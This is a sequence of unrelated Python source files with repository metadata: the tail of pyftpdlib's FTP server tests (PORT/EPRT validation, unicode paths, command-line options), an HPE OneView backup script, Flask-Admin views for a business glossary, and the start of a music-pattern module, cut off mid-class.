def test_on_logout_user_issued_twice(self):
users = []
class TestHandler(FTPHandler):
def on_logout(self, username):
users.append(username)
self._setUp(TestHandler)
# At this point user "user" is logged in. Re-login as anonymous,
# then quit and expect queue == ["user", "anonymous"]
self.client.login("anonymous")
self.client.quit()
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(users, [USER, 'anonymous'])
def test_on_logout_no_pass(self):
# make sure on_logout() is not called if USER was provided
# but not PASS
users = []
class TestHandler(FTPHandler):
def on_logout(self, username):
users.append(username)
self._setUp(TestHandler, login=False)
self.client.sendcmd("user foo")
self.client.quit()
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(users, [])
class _TestNetworkProtocols(object):
"""Test PASV, EPSV, PORT and EPRT commands.
Do not use this class directly, let TestIPv4Environment and
TestIPv6Environment classes use it instead.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = HOST
def setUp(self):
self.server = self.server_class((self.HOST, 0))
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
if self.client.af == socket.AF_INET:
self.proto = "1"
self.other_proto = "2"
else:
self.proto = "2"
self.other_proto = "1"
def tearDown(self):
self.client.close()
self.server.stop()
def cmdresp(self, cmd):
"""Send a command and return response, also if the command failed."""
try:
return self.client.sendcmd(cmd)
except ftplib.Error as err:
return str(err)
@disable_log_warning
def test_eprt(self):
if not SUPPORTS_HYBRID_IPV6:
# test wrong proto
try:
self.client.sendcmd('eprt |%s|%s|%s|' % (self.other_proto,
self.server.host, self.server.port))
except ftplib.error_perm as err:
self.assertEqual(str(err)[0:3], "522")
else:
self.fail("Exception not raised")
# test bad args
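        # RFC-2428 syntax is EPRT<space><d><net-prt><d><net-addr><d>
        # <tcp-port><d>, where <d> is the '|' delimiter and <net-prt>
        # is 1 for IPv4 or 2 for IPv6.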
msg = "501 Invalid EPRT format."
# len('|') > 3
self.assertEqual(self.cmdresp('eprt ||||'), msg)
# len('|') < 3
self.assertEqual(self.cmdresp('eprt ||'), msg)
# port > 65535
self.assertEqual(self.cmdresp('eprt |%s|%s|65536|' % (self.proto,
self.HOST)), msg)
# port < 0
self.assertEqual(self.cmdresp('eprt |%s|%s|-1|' % (self.proto,
self.HOST)), msg)
# port < 1024
resp = self.cmdresp('eprt |%s|%s|222|' % (self.proto, self.HOST))
self.assertEqual(resp[:3], '501')
self.assertIn('privileged port', resp)
# proto > 2
_cmd = 'eprt |3|%s|%s|' % (self.server.host, self.server.port)
self.assertRaises(ftplib.error_perm, self.client.sendcmd, _cmd)
if self.proto == '1':
# len(ip.octs) > 4
self.assertEqual(self.cmdresp('eprt |1|1.2.3.4.5|2048|'), msg)
# ip.oct > 255
self.assertEqual(self.cmdresp('eprt |1|1.2.3.256|2048|'), msg)
# bad proto
resp = self.cmdresp('eprt |2|1.2.3.256|2048|')
self.assertTrue("Network protocol not supported" in resp)
# test connection
with contextlib.closing(socket.socket(self.client.af)) as sock:
sock.bind((self.client.sock.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
self.client.sendcmd('eprt |%s|%s|%s|' % (self.proto, ip, port))
try:
s = sock.accept()
s[0].close()
except socket.timeout:
self.fail("Server didn't connect to passive socket")
def test_epsv(self):
# test wrong proto
try:
self.client.sendcmd('epsv ' + self.other_proto)
except ftplib.error_perm as err:
self.assertEqual(str(err)[0:3], "522")
else:
self.fail("Exception not raised")
# proto > 2
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'epsv 3')
# test connection
for cmd in ('EPSV', 'EPSV ' + self.proto):
host, port = ftplib.parse229(self.client.sendcmd(cmd),
self.client.sock.getpeername())
with contextlib.closing(
socket.socket(self.client.af, socket.SOCK_STREAM)) as s:
s.settimeout(TIMEOUT)
s.connect((host, port))
self.client.sendcmd('abor')
def test_epsv_all(self):
self.client.sendcmd('epsv all')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'pasv')
self.assertRaises(ftplib.error_perm, self.client.sendport, self.HOST,
2000)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'eprt |%s|%s|%s|' % (self.proto, self.HOST, 2000))
@unittest.skipUnless(SUPPORTS_IPV4, "IPv4 not supported")
class TestIPv4Environment(_TestNetworkProtocols, unittest.TestCase):
"""Test PASV, EPSV, PORT and EPRT commands.
Runs tests contained in _TestNetworkProtocols class by using IPv4
plus some additional specific tests.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = '127.0.0.1'
@disable_log_warning
def test_port_v4(self):
# test connection
with contextlib.closing(self.client.makeport()):
self.client.sendcmd('abor')
# test bad arguments
ae = self.assertEqual
msg = "501 Invalid PORT format."
ae(self.cmdresp('port 127,0,0,1,1.1'), msg) # sep != ','
ae(self.cmdresp('port X,0,0,1,1,1'), msg) # value != int
ae(self.cmdresp('port 127,0,0,1,1,1,1'), msg) # len(args) > 6
ae(self.cmdresp('port 127,0,0,1'), msg) # len(args) < 6
ae(self.cmdresp('port 256,0,0,1,1,1'), msg) # oct > 255
ae(self.cmdresp('port 127,0,0,1,256,1'), msg) # port > 65535
ae(self.cmdresp('port 127,0,0,1,-1,0'), msg) # port < 0
# port < 1024
resp = self.cmdresp('port %s,1,1' % self.HOST.replace('.', ','))
self.assertEqual(resp[:3], '501')
self.assertIn('privileged port', resp)
if "1.2.3.4" != self.HOST:
            resp = self.cmdresp('port 1,2,3,4,4,4')
            self.assertIn('foreign address', resp, resp)
@disable_log_warning
def test_eprt_v4(self):
resp = self.cmdresp('eprt |1|0.10.10.10|2222|')
self.assertEqual(resp[:3], '501')
self.assertIn('foreign address', resp)
def test_pasv_v4(self):
host, port = ftplib.parse227(self.client.sendcmd('pasv'))
with contextlib.closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.settimeout(TIMEOUT)
s.connect((host, port))
@unittest.skipUnless(SUPPORTS_IPV6, "IPv6 not supported")
class TestIPv6Environment(_TestNetworkProtocols, unittest.TestCase):
"""Test PASV, EPSV, PORT and EPRT commands.
Runs tests contained in _TestNetworkProtocols class by using IPv6
plus some additional specific tests.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = '::1'
def test_port_v6(self):
# PORT is not supposed to work
self.assertRaises(ftplib.error_perm, self.client.sendport,
self.server.host, self.server.port)
def test_pasv_v6(self):
# PASV is still supposed to work to support clients using
# IPv4 connecting to a server supporting both IPv4 and IPv6
self.client.makepasv()
@disable_log_warning
def test_eprt_v6(self):
resp = self.cmdresp('eprt |2|::foo|2222|')
self.assertEqual(resp[:3], '501')
self.assertIn('foreign address', resp)
@unittest.skipUnless(SUPPORTS_HYBRID_IPV6, "IPv4/6 dual stack not supported")
class TestIPv6MixedEnvironment(unittest.TestCase):
"""By running the server by specifying "::" as IP address the
server is supposed to listen on all interfaces, supporting both
IPv4 and IPv6 by using a single socket.
    What we do here is start the server in this manner and try to
    connect with an IPv4 client.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = "::"
def setUp(self):
self.server = self.server_class((self.HOST, 0))
self.server.start()
self.client = None
def tearDown(self):
if self.client is not None:
self.client.close()
self.server.stop()
def test_port_v4(self):
def noop(x):
return x
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.set_pasv(False)
self.client.login(USER, PASSWD)
self.client.retrlines('list', noop)
def test_pasv_v4(self):
def noop(x):
return x
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.set_pasv(True)
self.client.login(USER, PASSWD)
self.client.retrlines('list', noop)
# make sure pasv response doesn't return an IPv4-mapped address
ip = self.client.makepasv()[0]
self.assertFalse(ip.startswith("::ffff:"))
def test_eprt_v4(self):
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.login(USER, PASSWD)
# test connection
with contextlib.closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind((self.client.sock.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
self.client.sendcmd('eprt |1|%s|%s|' % (ip, port))
try:
sock2, addr = sock.accept()
sock2.close()
except socket.timeout:
self.fail("Server didn't connect to passive socket")
def test_epsv_v4(self):
def mlstline(cmd):
return self.client.voidcmd(cmd).split('\n')[1]
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.login(USER, PASSWD)
host, port = ftplib.parse229(self.client.sendcmd('EPSV'),
self.client.sock.getpeername())
self.assertEqual('127.0.0.1', host)
with contextlib.closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.settimeout(TIMEOUT)
s.connect((host, port))
self.assertTrue(mlstline('mlst /').endswith('/'))
class TestCornerCases(unittest.TestCase):
"""Tests for any kind of strange situation for the server to be in,
mainly referring to bugs signaled on the bug tracker.
"""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
if self.server.running:
self.server.stop()
def test_port_race_condition(self):
# Refers to bug #120, first sends PORT, then disconnects the
# control channel before accept()ing the incoming data connection.
# The original server behavior was to reply with "200 Active
# data connection established" *after* the client had already
# disconnected the control connection.
with contextlib.closing(socket.socket(self.client.af)) as sock:
sock.bind((self.client.sock.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(TIMEOUT)
host, port = sock.getsockname()[:2]
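            # PORT arguments are the 4 IP octets followed by the port
            # number split into its high and low bytes, i.e.
            # port == p1 * 256 + p2 (RFC-959)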
hbytes = host.split('.')
pbytes = [repr(port // 256), repr(port % 256)]
bytes = hbytes + pbytes
cmd = 'PORT ' + ','.join(bytes) + '\r\n'
self.client.sock.sendall(b(cmd))
self.client.quit()
s, addr = sock.accept()
s.close()
def test_stou_max_tries(self):
        # Emulates the case where the max number of tries to find a
        # unique file name while processing the STOU command is hit.
class TestFS(AbstractedFS):
def mkstemp(self, *args, **kwargs):
raise IOError(errno.EEXIST,
"No usable temporary file name found")
self.server.handler.abstracted_fs = TestFS
try:
self.client.quit()
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'stou')
finally:
self.server.handler.abstracted_fs = AbstractedFS
def test_quick_connect(self):
# Clients that connected and disconnected quickly could cause
# the server to crash, due to a failure to catch errors in the
# initial part of the connection process.
# Tracked in issues #91, #104 and #105.
# See also https://bugs.launchpad.net/zodb/+bug/135108
import struct
def connect(addr):
with contextlib.closing(socket.socket()) as s:
                # Setting SO_LINGER to (1, 0) causes a connection reset
                # (RST) to be sent when close() is called, instead of the
                # standard FIN shutdown sequence.
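                # struct.pack('ii', 1, 0) encodes (l_onoff=1, l_linger=0),
                # i.e. an abortive close.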
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
s.settimeout(TIMEOUT)
try:
s.connect(addr)
except socket.error:
pass
for x in range(10):
connect((self.server.host, self.server.port))
for x in range(10):
addr = self.client.makepasv()
connect(addr)
def test_error_on_callback(self):
        # test that the server does not crash in case an error occurs
        # while firing a scheduled function
self.tearDown()
server = FTPServer((HOST, 0), FTPHandler)
self.addCleanup(server.close)
logger = logging.getLogger('pyftpdlib')
logger.disabled = True
try:
len1 = len(IOLoop.instance().socket_map)
IOLoop.instance().call_later(0, lambda: 1 // 0)
server.serve_forever(timeout=0.001, blocking=False)
len2 = len(IOLoop.instance().socket_map)
self.assertEqual(len1, len2)
finally:
logger.disabled = False
def test_active_conn_error(self):
        # we open a socket() but avoid invoking accept() in order to
        # reproduce this error condition:
        # http://code.google.com/p/pyftpdlib/source/detail?r=905
with contextlib.closing(socket.socket()) as sock:
sock.bind((HOST, 0))
port = sock.getsockname()[1]
self.client.sock.settimeout(.1)
try:
resp = self.client.sendport(HOST, port)
except ftplib.error_temp as err:
self.assertEqual(str(err)[:3], '425')
except (socket.timeout, getattr(ssl, "SSLError", object())):
pass
else:
self.assertNotEqual(str(resp)[:3], '200')
def test_repr(self):
# make sure the FTP/DTP handler classes have a sane repr()
with contextlib.closing(self.client.makeport()):
for inst in IOLoop.instance().socket_map.values():
repr(inst)
str(inst)
if hasattr(os, 'sendfile'):
def test_sendfile(self):
# make sure that on python >= 3.3 we're using os.sendfile
# rather than third party pysendfile module
from pyftpdlib.handlers import sendfile
self.assertIs(sendfile, os.sendfile)
if SUPPORTS_SENDFILE:
def test_sendfile_enabled(self):
self.assertEqual(FTPHandler.use_sendfile, True)
if hasattr(select, 'epoll') or hasattr(select, 'kqueue'):
def test_ioloop_fileno(self):
fd = self.server.server.ioloop.fileno()
self.assertTrue(isinstance(fd, int), fd)
# TODO: disabled as on certain platforms (OSX and Windows)
# produces failures with python3. Will have to get back to
# this and fix it.
@unittest.skipIf(OSX or WINDOWS, "fails on OSX or Windows")
class TestUnicodePathNames(unittest.TestCase):
"""Test FTP commands and responses by using path names with non
ASCII characters.
"""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.encoding = 'utf8' # PY3 only
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
if PY3:
safe_mkdir(bytes(TESTFN_UNICODE, 'utf8'))
touch(bytes(TESTFN_UNICODE_2, 'utf8'))
self.utf8fs = TESTFN_UNICODE in os.listdir('.')
else:
warnings.filterwarnings("ignore")
safe_mkdir(TESTFN_UNICODE)
touch(TESTFN_UNICODE_2)
self.utf8fs = unicode(TESTFN_UNICODE, 'utf8') in os.listdir(u('.'))
warnings.resetwarnings()
def tearDown(self):
self.client.close()
self.server.stop()
remove_test_files()
# --- fs operations
def test_cwd(self):
if self.utf8fs:
resp = self.client.cwd(TESTFN_UNICODE)
self.assertTrue(TESTFN_UNICODE in resp)
else:
self.assertRaises(ftplib.error_perm, self.client.cwd,
TESTFN_UNICODE)
def test_mkd(self):
if self.utf8fs:
os.rmdir(TESTFN_UNICODE)
dirname = self.client.mkd(TESTFN_UNICODE)
self.assertEqual(dirname, '/' + TESTFN_UNICODE)
self.assertTrue(os.path.isdir(TESTFN_UNICODE))
else:
self.assertRaises(ftplib.error_perm, self.client.mkd,
TESTFN_UNICODE)
def test_rmdir(self):
if self.utf8fs:
self.client.rmd(TESTFN_UNICODE)
else:
self.assertRaises(ftplib.error_perm, self.client.rmd,
TESTFN_UNICODE)
def test_rnfr_rnto(self):
if self.utf8fs:
self.client.rename(TESTFN_UNICODE, TESTFN)
else:
self.assertRaises(ftplib.error_perm, self.client.rename,
TESTFN_UNICODE, TESTFN)
def test_size(self):
self.client.sendcmd('type i')
if self.utf8fs:
self.client.sendcmd('size ' + TESTFN_UNICODE_2)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'size ' + TESTFN_UNICODE_2)
def test_mdtm(self):
if self.utf8fs:
self.client.sendcmd('mdtm ' + TESTFN_UNICODE_2)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'mdtm ' + TESTFN_UNICODE_2)
def test_stou(self):
if self.utf8fs:
resp = self.client.sendcmd('stou ' + TESTFN_UNICODE)
self.assertTrue(TESTFN_UNICODE in resp)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stou ' + TESTFN_UNICODE)
if hasattr(os, 'chmod'):
def test_site_chmod(self):
if self.utf8fs:
self.client.sendcmd('site chmod 777 ' + TESTFN_UNICODE)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod 777 ' + TESTFN_UNICODE)
# --- listing cmds
def _test_listing_cmds(self, cmd):
ls = []
self.client.retrlines(cmd, ls.append)
ls = '\n'.join(ls)
if self.utf8fs:
self.assertTrue(TESTFN_UNICODE in ls)
else:
            # Parts of the filename which are not encodable are supposed
# to have been replaced. The file should be something like
# 'tmp-pyftpdlib-unicode-????'. In any case it is not
# referenceable (e.g. DELE 'tmp-pyftpdlib-unicode-????'
# won't work).
self.assertTrue('tmp-pyftpdlib-unicode' in ls)
def test_list(self):
self._test_listing_cmds('list')
def test_nlst(self):
self._test_listing_cmds('nlst')
def test_mlsd(self):
self._test_listing_cmds('mlsd')
def test_mlst(self):
# utility function for extracting the line of interest
def mlstline(cmd):
return self.client.voidcmd(cmd).split('\n')[1]
if self.utf8fs:
self.assertTrue('type=dir' in
mlstline('mlst ' + TESTFN_UNICODE))
self.assertTrue('/' + TESTFN_UNICODE in
mlstline('mlst ' + TESTFN_UNICODE))
self.assertTrue('type=file' in
mlstline('mlst ' + TESTFN_UNICODE_2))
self.assertTrue('/' + TESTFN_UNICODE_2 in
mlstline('mlst ' + TESTFN_UNICODE_2))
else:
self.assertRaises(ftplib.error_perm,
mlstline, 'mlst ' + TESTFN_UNICODE)
# --- file transfer
def test_stor(self):
if self.utf8fs:
data = b'abcde12345' * 500
os.remove(TESTFN_UNICODE_2)
dummy = BytesIO()
dummy.write(data)
dummy.seek(0)
self.client.storbinary('stor ' + TESTFN_UNICODE_2, dummy)
dummy_recv = BytesIO()
self.client.retrbinary('retr ' + TESTFN_UNICODE_2,
dummy_recv.write)
dummy_recv.seek(0)
self.assertEqual(dummy_recv.read(), data)
else:
dummy = BytesIO()
self.assertRaises(ftplib.error_perm, self.client.storbinary,
'stor ' + TESTFN_UNICODE_2, dummy)
def test_retr(self):
if self.utf8fs:
data = b'abcd1234' * 500
with open(TESTFN_UNICODE_2, 'wb') as f:
f.write(data)
dummy = BytesIO()
self.client.retrbinary('retr ' + TESTFN_UNICODE_2, dummy.write)
dummy.seek(0)
self.assertEqual(dummy.read(), data)
else:
dummy = BytesIO()
self.assertRaises(ftplib.error_perm, self.client.retrbinary,
'retr ' + TESTFN_UNICODE_2, dummy.write)
class TestCommandLineParser(unittest.TestCase):
"""Test command line parser."""
SYSARGV = sys.argv
STDERR = sys.stderr
def setUp(self):
class DummyFTPServer(FTPServer):
"""An overridden version of FTPServer class which forces
serve_forever() to return immediately.
"""
def serve_forever(self, *args, **kwargs):
return
if PY3:
import io
self.devnull = io.StringIO()
else:
self.devnull = BytesIO()
sys.argv = self.SYSARGV[:]
sys.stderr = self.STDERR
self.original_ftpserver_class = FTPServer
pyftpdlib.__main__.FTPServer = DummyFTPServer
def tearDown(self):
self.devnull.close()
sys.argv = self.SYSARGV[:]
sys.stderr = self.STDERR
pyftpdlib.servers.FTPServer = self.original_ftpserver_class
safe_rmdir(TESTFN)
def test_a_option(self):
sys.argv += ["-i", "localhost", "-p", "0"]
pyftpdlib.__main__.main()
sys.argv = self.SYSARGV[:]
# no argument
sys.argv += ["-a"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_p_option(self):
sys.argv += ["-p", "0"]
pyftpdlib.__main__.main()
# no argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-p"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# invalid argument
sys.argv += ["-p foo"]
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_w_option(self):
sys.argv += ["-w", "-p", "0"]
with warnings.catch_warnings():
warnings.filterwarnings("error")
self.assertRaises(RuntimeWarning, pyftpdlib.__main__.main)
# unexpected argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-w foo"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_d_option(self):
sys.argv += ["-d", TESTFN, "-p", "0"]
safe_mkdir(TESTFN)
pyftpdlib.__main__.main()
# without argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-d"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# no such directory
sys.argv = self.SYSARGV[:]
sys.argv += ["-d %s" % TESTFN]
safe_rmdir(TESTFN)
self.assertRaises(ValueError, pyftpdlib.__main__.main)
def test_r_option(self):
sys.argv += ["-r 60000-61000", "-p", "0"]
pyftpdlib.__main__.main()
# without arg
sys.argv = self.SYSARGV[:]
sys.argv += ["-r"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# wrong arg
sys.argv = self.SYSARGV[:]
sys.argv += ["-r yyy-zzz"]
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_v_option(self):
sys.argv += ["-v"]
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# unexpected argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-v foo"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_V_option(self):
with mock.patch('pyftpdlib.__main__.config_logging') as fun:
sys.argv += ["-V"]
pyftpdlib.__main__.main()
fun.assert_called_once_with(level=logging.DEBUG)
# unexpected argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-V foo"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
configure_logging()
remove_test_files()
if __name__ == '__main__':
unittest.main(verbosity=VERBOSITY)
|
{
"content_hash": "d61008b4fcafbaa0eaf30d9d7a674e63",
"timestamp": "",
"source": "github",
"line_count": 2833,
"max_line_length": 79,
"avg_line_length": 38.55771267207907,
"alnum_prop": 0.5840214585202409,
"repo_name": "aliyun/oss-ftp",
"id": "d46e0b5b4c8ca6a39c7e8ed43ee127364033e687",
"size": "109418",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "python27/unix/lib/pyftpdlib/test/test_functional.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "247"
},
{
"name": "C",
"bytes": "439021"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "26115"
},
{
"name": "CSS",
"bytes": "84389"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "HTML",
"bytes": "140138"
},
{
"name": "JavaScript",
"bytes": "5048"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "24513573"
},
{
"name": "Roff",
"bytes": "21"
},
{
"name": "Shell",
"bytes": "7275"
},
{
"name": "Tcl",
"bytes": "2150885"
},
{
"name": "Visual Basic",
"bytes": "529"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import range
from future import standard_library
standard_library.install_aliases()
import sys
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if PY2:
if PYTHON_VERSION < (2, 7, 9):
raise Exception('Must use Python 2.7.9 or later')
elif PYTHON_VERSION < (3, 4):
raise Exception('Must use Python 3.4 or later')
import hpOneView as hpov
import os.path
from pprint import pprint
def acceptEULA(con):
# See if we need to accept the EULA before we try to log in
try:
if con.get_eula_status() is True:
print("EULA display needed")
con.set_eula('no')
except Exception as e:
print('EXCEPTION:')
print(e)
def login(con, credential):
    # Log in with the given credentials
try:
con.login(credential)
except:
print('Login failed')
def get_backup(sts):
print('Generating appliance backup')
backup = sts.generate_backup()
print('Downloading appliance backup')
sts.download_backup(backup)
def main():
parser = argparse.ArgumentParser(add_help=True,
formatter_class=argparse.RawTextHelpFormatter,
description='''
Generate a OneView Backup
Usage: ''')
parser.add_argument('-a', dest='host', required=True,
help='''
HPE OneView Appliance hostname or IP address''')
parser.add_argument('-u', dest='user', required=False,
default='Administrator',
help='''
HPE OneView Username''')
parser.add_argument('-p', dest='passwd', required=True,
help='''
HPE OneView Password''')
parser.add_argument('-c', dest='cert', required=False,
help='''
Trusted SSL Certificate Bundle in PEM (Base64 Encoded DER) Format''')
parser.add_argument('-y', dest='proxy', required=False,
help='''
    Proxy (host:port format)''')
parser.add_argument('-j', dest='domain', required=False,
default='Local',
help='''
HPE OneView Authorized Login Domain''')
args = parser.parse_args()
credential = {'authLoginDomain': args.domain.upper(), 'userName': args.user, 'password': args.passwd}
con = hpov.connection(args.host)
sts = hpov.settings(con)
if args.proxy:
con.set_proxy(args.proxy.split(':')[0], args.proxy.split(':')[1])
if args.cert:
con.set_trusted_ssl_bundle(args.cert)
login(con, credential)
acceptEULA(con)
get_backup(sts)
sys.exit()
if __name__ == '__main__':
import argparse
sys.exit(main())
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
|
{
"content_hash": "ab7794ecfa227e6b323d9b76318f0688",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 105,
"avg_line_length": 29.08910891089109,
"alnum_prop": 0.6031313818924439,
"repo_name": "andreadean5/python-hpOneView",
"id": "aeb0d1650d48dd93b91734ade05d842186caf114",
"size": "4095",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/scripts/get-backup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "920844"
}
],
"symlink_target": ""
}
|
import os
from flask_admin import Admin, BaseView, form, expose, AdminIndexView
from flask_admin.contrib.sqla import ModelView
from flask_security import current_user
#from app.term_bp.forms import PrintForm
from app.extensions import db
from app.models import Category, Term, Rule, Document, Link
from app.config import BASE_DIR
# Create directory for file fields to use
FILE_PATH = os.path.join(BASE_DIR, 'app', 'static', 'files')
try:
os.mkdir(FILE_PATH)
except OSError:
pass
######################
## Admin views
######################
class MyHomeView(AdminIndexView):
'''Add a custom home view'''
@expose('/')
def index(self):
stats = {
'terms': Term.query.count(),
'rules': Rule.query.count(),
'documents': Document.query.count(),
'links': Link.query.count()
}
return self.render('admin/index.html', stats=stats)
class ProtectedModelView(ModelView):
    '''Check the current user has the admin role for each admin view'''
def is_accessible(self):
return current_user.has_role('admin')
class FileView(ProtectedModelView):
'''Override form field to use Flask-Admin FileUploadField'''
form_overrides = {
'path': form.FileUploadField
}
# Pass additional parameters to 'path' to FileUploadField constructor
form_args = {
'path': {
'label': 'File',
'base_path': FILE_PATH,
'allow_overwrite': False
}
}
class RuleView(ProtectedModelView):
    '''Set the view options for displaying a Rule in the admin view'''
form_excluded_columns = ('created_on', 'updated_on')
column_list = ('identifier', 'name', 'description', 'notes')
#form_columns = ('identifier', 'name', 'description', 'notes', 'terms')
column_searchable_list = ['identifier', 'name', 'description']
column_default_sort = 'identifier'
form_widget_args = {
'notes': {
'rows': 10
},
'description': {
'rows': 5
}
}
class TermView(ProtectedModelView):
    '''Set the view options for displaying a Term in the admin view'''
form_create_columns = ('name', 'short_description', 'long_description', 'abbreviation', 'owner',
'steward', 'status', 'categories', 'links', 'rules', 'documents')
form_edit_columns = ('name', 'short_description', 'long_description', 'abbreviation', 'owner',
'steward', 'status', 'categories', 'links', 'rules', 'related_terms',
'documents', 'columns')
column_list = ['name', 'short_description', 'abbreviation', 'status', ]
form_excluded_columns = ('created_on', 'updated_on')
column_searchable_list = ['name']
form_widget_args = {
'long_description': {
'rows': 5
}
}
class TableView(ProtectedModelView):
    '''Set the view options for displaying a Table in the admin view'''
column_default_sort = 'name'
column_filters = ['location', 'name']
form_excluded_columns = ('columns')
class ColumnView(ProtectedModelView):
    '''Set the view options for displaying a Column in the admin view'''
column_filters = ['table', 'name']
class PrintView(BaseView):
    '''Add a print option to the admin menu'''
@expose('/')
def index(self):
blank_count = Term.query.filter_by(categories=None).count()
categories = Category.query.all()
return self.render('print/print_admin_menu.html', categories=categories, blank_count=blank_count)
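# Sketch of wiring these views into Flask-Admin (a hypothetical setup using
# only names imported above; the index_view hook is how MyHomeView replaces
# the default admin home page):
#
#     admin = Admin(index_view=MyHomeView(), template_mode='bootstrap3')
#     admin.add_view(TermView(Term, db.session, name='Terms'))
#     admin.add_view(RuleView(Rule, db.session, name='Rules'))
#     admin.add_view(PrintView(name='Print', endpoint='print'))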
|
{
"content_hash": "ebe29004bb4b175369d4b0321d121cf7",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 105,
"avg_line_length": 31.972972972972972,
"alnum_prop": 0.6151028458720766,
"repo_name": "atindale/business-glossary",
"id": "9d2b3702a8b88bee04ab8b6c92689bda96589b73",
"size": "4168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/main/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13158"
},
{
"name": "HTML",
"bytes": "122645"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "158304"
}
],
"symlink_target": ""
}
|
"""
Copyright 2016, Michael DeHaan <michael.dehaan@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from camp.band.selectors.endlessly import Endlessly
from camp.band.selectors.repeatedly import Repeatedly
from camp.band.selectors.randomly import Randomly
class Patterns(object):
def __init__(self, song, patterns=None):
assert patterns is not None
self._factory = song
self._patterns = dict()
self._save(patterns)
def _save(self, patterns):
for (name, pattern) in patterns.items():
if isinstance(pattern, str):
pattern = pattern.replace("|","").split()
# print("USING PATTERN: %s" % pattern)
self._patterns[name] = self.create(pattern)
def create(self, pattern):
raise NotImplementedError()
def as_dict(self):
return self._patterns
class RandomPatterns(Patterns):
def __init__(self, song, mode=None, patterns=None):
self.mode = mode
super().__init__(song, patterns=patterns)
def create(self, pattern):
return Randomly(pattern, mode=self.mode)
class EndlessPatterns(Patterns):
def create(self, pattern):
return Endlessly(pattern)
class BasicPatterns(Patterns):
